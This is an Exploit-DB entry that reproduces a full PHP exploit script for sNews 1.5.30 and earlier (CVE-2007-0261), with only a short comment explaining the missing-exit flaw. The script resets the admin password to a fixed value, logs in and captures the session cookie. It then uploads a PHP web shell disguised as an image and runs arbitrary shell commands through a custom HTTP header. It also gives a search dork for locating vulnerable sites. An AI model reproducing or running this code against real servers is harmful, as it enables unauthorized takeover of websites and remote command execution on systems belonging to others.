sNews 1.5.30 - Remote Reset Admin Pass / Command Execution

EDB-ID:

3116

CVE:

2007-0261

EDB Verified:

Author:

rgod

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2007-01-12

Vulnerable App: 
<?php
print_r('
---------------------------------------------------------------------------
sNews <= 1.5.30 unauthorized access / reset admin pass / cmd exec exploit
by rgod
dork: "Barbecued by sNews"
mail: retrog at alice dot it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');
/*
works regardless of php.ini settings
*/
if ($argc<5) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path your_ip cmd [options]
host:      target server (ip/hostname)
path:      path to sNews
your_ip:   your ip address, this is needed for upload
           this is automatically set to your proxy ip, if you use one
cmd:       a shell comand
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /snews/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost / cat snews.php -p81
---------------------------------------------------------------------------
');
    die;
}

error_reporting("E_ALL");
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$your_ip=$argv[3];
$port=80;
$proxy="";
$cmd="";
for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
  $tmp=explode(":",$proxy);
  $your_ip=$tmp[0];
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

/*
software site: http://www.solucija.com/home/snews/

you can have unauthorized access to admin password reset feature and other ones,
after that you can upload a php file and launch commands

see snews.php near lines 392-395:
...
function center() {
	if (isset($_GET['category'])) {$id = $action = $_GET['category'];}
	if (isset($_GET['articleid'])) {$articleid = $_GET['articleid'];}
	if (isset($_POST['submit_text'])) {processing(); $processed = true;}
...

now look at processing() function near line 1300:

...
function processing() {
	if ($_SESSION[db('website').'Logged_In'] != 'True') {notification(l('error_not_logged_in'),'','login/');}
...

and to notification() one near lines 675-680:

...
function notification($error, $errNote, $link) {
	$errNote = !empty($errNote) ? '<br />'.$errNote : '';
	echo '<h2'.(!empty($error) ? ' class="error">'.l('admin_error').'</h2><p>'.$error.$errNote.'</p>' : '>'.l('operation_completed').'</h2>');
	echo (!empty($link)) ? '<p><a href="'.db('website').$link.'" title="'.l('back').'">'.l('back').'</a></p>' : '';
}
...

funny! there is no exit() or die()...

this one reset the admin password and try to upload a php file
*/

$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="submit_text";

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="task";

changeup
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="submit_pass";

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="uname";

suntzu
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="pass1";

suntzu
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="pass2";

suntzu
-----------------------------7d61bcd1f033e--
';
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

$data ="uname=suntzu";
$data.="&pass=suntzu";
$data.="&Loginform=True";
$data.="&submit=Login";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!eregi("Admin</legend>",$html)){die("exploit failed...");}
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<count($temp);$i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=trim(str_replace("\n","",str_replace("\r","",$temp2[0])));
}
//echo "cookie -> ".$cookie."\n";

$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="upload_dir";

.
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="imagefile"; filename="config.php"
Content-Type: image/jpeg;

<?php error_reporting(0); set_time_limit(0); echo "my_delim"; passthru($_SERVER["HTTP_SUNTZU"]); echo "my_delim";?>
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="ip";

'.$your_ip.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="time";

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="upload";

Upload
-----------------------------7d61bcd1f033e--
';
$packet ="POST ".$p."files/ HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

$packet ="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="SUNTZU: ".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("my_delim",$html))
{
$temp=explode("my_delim",$html);
echo $temp[1];
}
else
{
  echo "exploit succeeded... but, for some reason, failed to upload shell, try to login manually with user 'suntzu' & password 'suntzu'";
}
?>

# milw0rm.com [2007-01-12]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services